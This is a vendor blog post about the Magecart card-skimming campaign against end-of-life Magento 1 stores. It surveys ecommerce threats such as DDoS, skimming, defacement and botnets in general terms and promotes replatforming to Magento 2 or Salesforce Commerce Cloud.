How to Improve Ecommerce Security after Magento Hack


The recent news of the Magento 1 website hack feels like a punch to the gut. How can cyber attackers wreak so much havoc on your ecommerce business, and what should you do in response to the most extensive cybersecurity campaign in ecommerce history?

During the last five years, the cybercriminals known as Magecart have breached sites and planted malicious scripts inside stores’ source code, which logs payment card details used in an online shopping cart. The problem? Most of the compromised sites used version 1x of the Magento online store software—the version that reached end of life on June 30, 2020, sunsetting without any further security updates. For this hacking campaign, which affected 2,000 Magento stores, that very security vulnerability turned out to be the perfect scenario for hackers looking to exploit the absence of critical security patches.

Magecart has hit hard and often, so much that both FBI and Adobe (which owns Magento) issued warnings to store owners needing to upgrade. Foregenix, a security and compliance firm, analyzed nearly 9 million websites worldwide and found 87% of websites using the Magento platform were at high risk for cyber-attacks—compared to 10% of websites on other popular platforms.

4 Ecommerce Security Risks that Test Customer Loyalty and Lose Money

The open-source platform of Magento can offer merchants the ability to edit their source code, offering flexibility and ample customization. However, businesses are supposed to keep their site safe, under Magento’s Shared Responsibility model. That includes installing the most updated security patches immediately to reduce security risks. Here’s what you need to know about critical ecommerce security vulnerabilities:

1) Beware of potential server attacks

If your server hosts your ecommerce site, you will need to protect it from Distributed Denial of Service attacks (also known as DDoS), which intentionally overwhelms the server with traffic, disrupting service on your site. If time is money, then for every minute your site is down, shoppers can’t complete purchases, and your business is out revenue.

2) Understand Credit Card Hijacking

Hackers like to exploit vulnerabilities allowing them to obtain payment data coming through your online shopping cart—it’s what made Magecart famous. By inserting malicious JavaScript code into checkout software systems, they can quickly skim credit cards, compromising sensitive personal and payment information. When a customer’s data is hacked, trust is lost, deterring loyalty, and increasing customer acquisition time and expense.

3) Monitor for Website Defacement

In fall 2019, Magento issued a security patch that opened a window for hackers to execute a remote code, which is how homepages are vandalized or various files across sites are compromised. This type of fraud can affect brand reputation if defacement is not caught early, and any indication of a compromised site will turn off customers before handing over any payment information.

4) Watch for Malicious Botnetting

While it’s common to use botnets to perform routine tasks automatically, in some cases, botnets can be leveraged against you, adding your machine to a connection of machines and putting your site under some else’s control. When that happens, spam emails from your brand can go to millions of customers, not only breaking trust in your brand but reducing your deliverability of future emails when your server becomes blacklisted.

Even though Magento 1 has reached end of life, now is the perfect time to dive deeper into your needs as an ecommerce business and decide what kind of platform would help you grow best. Below are two options to consider at this junction when looking to increase security—and your customer’s trust.

Option 1: Should you Secure a Magento 1 Store or Just Replatform to Magento 2?

Security analysts explain options for securing a site on Magento 1 aren’t feasible since the software is at end of life. Without support from Magento, you’d likely need to hire help to prevent cyberattacks and perform routine support and maintenance. Some hosting companies cover platform security but may not offer the patches and updates you will need for your Magento source code.

While the risk isn’t the same if you move from Magento 1 to Magento 2, it will still require a full migration similar to choosing a new ecommerce platform from scratch.

A Magento 2 installation will be easier than trying to keep up with your Magento 1 store since Magento provides support, patches, and updates. However, your business will need to manage Payment Card Industry (PCI) Security Standards Council compliance and guarantee patches and updates are performed routinely. While Magento 2 is technically PCI compliant, you, as the merchant making changes to source code, are responsible for your security of your customized instance of the Magento Commerce app running on the Magento Commerce cloud environment.

Translated, that means your business is responsible for confirming secure configuration and code; managing active monitoring such as penetration testing and vulnerability scans; safeguarding security of all customizations, extensions, apps, and integrations; and controlling all code deployments/security patch applications. Additionally, the more a merchant customizes a store, the more time it will need to install future updates and patches. Also, keep in mind honoring PCI compliance—some payment providers have said they will no longer support merchants on Magento 1, telling merchants to move on to Magento 2.

Read more about Magento support and Magento replatforming services.

Option 2: Would a Switch to a New Ecommerce Platform Be Worth it?

The right ecommerce platform should be equipped with crucial functionalities built to enforce security and combat fraud. For example, when you enter the platform, your details should be protected by encryption and server authentication.

Switching from Magento to a new flexible ecommerce platform would also include a full replatform. However, migrating to a platform like Salesforce Commerce Cloud helps you reduce security risks and eliminate any need to make software and security updates, protecting you from potential server attacks and maintaining your PCI compliance.

Salesforce Commerce Cloud is loaded with cartridges that are purpose-built to enforce security and block fraud tactics, each one focusing on different aspects, so businesses can customize their online security. Salesforce provides a website to check for real-time information on system performance and security, providing transparency around their products.

Finally, Salesforce Commerce Cloud replatforming uses clicks, not code, to build ecommerce experiences with an array of templates with flexible customization using apps with commerce APIs to offer personalized, engaging experiences with user-friendly tools.

However you decide to eliminate your ecommerce security risks, it’s vital now more than ever to find a scalable platform ensuring brand security to give your customers the best experience possible—and keep them for life.

OSF Digital provides technology, consulting, implementation, and online shop management services to emerging and premier brands, and merchants focused on building multi-cloud and unified commerce projects using Salesforce clous and other top-tier cloud technologies. Discover what you can achieve with our replatforming services.

Like the fine details? Check out Salesforce’s security, privacy, and architecture as of September 2020, including audits, certifications, security policy and procedures, reliability and backup, disaster recovery protocol, among others.

Engage an Expert

To discuss how OSF can help you with your

Ecommerce Platform Security Risks